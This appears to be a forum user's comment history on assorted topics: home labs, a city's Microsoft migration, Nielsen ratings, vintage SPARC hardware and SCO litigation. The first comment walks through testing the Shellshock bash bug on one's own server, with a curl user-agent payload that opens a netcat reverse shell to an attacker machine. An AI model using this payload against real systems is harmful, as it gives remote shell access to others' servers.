Comment Here's a fun little test... (Score 3, Informative) 318

Here's a fun little test. This is assuming both the attacker and target have netcat installed. On a machine with the vulnerable bash and apache-cgi (behind a firewall for god's sake!) drop a file in your cgi-bin directory:

echo Content-type: text/plain
echo ""

You should be able to go to


and get a listing of apache's cgi directory.

Now, from your attack machine run "nc -l -p 1234", and then (in another terminal) run "curl -A "() { :;}; /bin/nc attack.machine.ip.address 1234 -c /bin/bash". You now have a shell via netcat.

(from attacking machine netcat)

touch /tmp/pwnt

(on target)

ls -al /tmp/pwnt

$-rw-r--r-- 1 www-data www-data 0 Sep 25 15:53 /tmp/pwnt

Comment Down to two servers... (Score 1) 287

I used to run a whole pile of servers, from DEC alphas to various Ultrasparcs to Linux servers.... now I'm down to a single ZFS-on-linux SAN server and a Supermicro chassis that has two dual-quad motherboards with 32GB of RAM each running a pair of Xen hypervisors. In my home lab I can fire up VMs left and right to test whatever I need to before I bring it to a client and play with my own projects at the same time. The important stuff I have runs in a datacenter but it's been great having such a flexible home lab. The only downside is the Supermicro is LOUD due to all of its tiny little high-speed fans so I've had to baffle it with various home-made contraptions to keep it from sounding like a jet.

Comment Document formats... (Score 5, Insightful) 579

As far as I can tell from that horrible translation the only real complaints from users are about document interoperability problems and a unified messaging platform. Document format problems were going to be a given as MS will NEVER allow their software to default to an open standard (gotta sell dem Office seats); the best you can do is tell everyone who is going to be dealing with your city to send your documents in a universal standard. As far as a unified messaging platform goes, somebody screwed up if they couldn't get a fleet of smartphones to talk to a standard email server. Integrating with an open caldav/carddav server is tougher, but not impossible. They've already dropped a lot of cash on this transition and if those are the only two real complaints it seems more likely that the politicos are banking on a pile of $$ concessions from MS.

Comment Article is bereft of real numbers (Score 5, Interesting) 349

Households that do not own a TV set? Or households that own a TV set but don't have cable, OTA TV? In our case we dropped cable several years ago, still have OTA TV thanks to an antenna on the roof of our condo, but consume the vast majority of content through a computer hooked to the TV. So we own a TV, but according to Nielsen's rules maybe we don't own a TV? Maybe we just own a huge monitor? Maybe we don't qualify to be a Nielsen Family so we don't count?

Comment SPARC Classic (Score 1) 317

Oldest one I still -own- is a SPARC Classic (the old lunchbox 50MHz sun4m one). It sits on a shelf; I haven't used it or really thought about it for a while. I mainly still have it for nostalgia - it's what I learned Solaris on back in the day (2.5 or 2.6 I think) when I was a lowly tech support drone at a small mom-and-pop ISP in the mid-90s, and I also learned a lot about UNIX/Linux networking by figuring out how to netboot slackware onto it. An ISP I sysadmined for from 2001-2006 or so used a stack of them for DNS and NTP servers. I also have a SUN Blade 100 that I retired as a desktop UNIX machine a few years ago as it no longer has the balls to keep up (Firefox/Thunderbird/etc bloat). It also got relegated to a closet as I can't bring myself to throw it away. I also had a few pizza-box Sparcstations and Ultrasparc/US2 systems as part of my personal lab over the years but eventually recycled them. None of the places I consult/contract for use Solaris anymore, so it's hard to justify running multiple systems for testing when I can run a cheap dual-quad core Linux box with Xen VMs and simulate a large network on a single system.

The oldest machine I still have in use is an old Dell PIII (slot style!) that I run Windows 98 on to play some old games, like Jane's USAF, Dungeon Keeper/DK2 and Mechwarrior 3. It spends most of its time shut off, but every now and then I get a hankerin' for a spankerin'.

Comment Re:Just one case (Score 1) 152

I'm also hoping to see SCO v Microsoft, where SCO sues Microsoft for not providing sufficient funds to slow the growth of Linux as agreed, and Microsoft countersues because SCO didn't achieve the success they promised with the initial round of funding.

Woohoo! Microsoft gets to double their investment!

The sad part is, the only ones who made out on the original investment are a bunch of greedy, slimeball shyster lawyers and a greedy, scumsucking worthless CEO. Whoops, I just made a tautology train. Everyone on board! WOO WOOOO

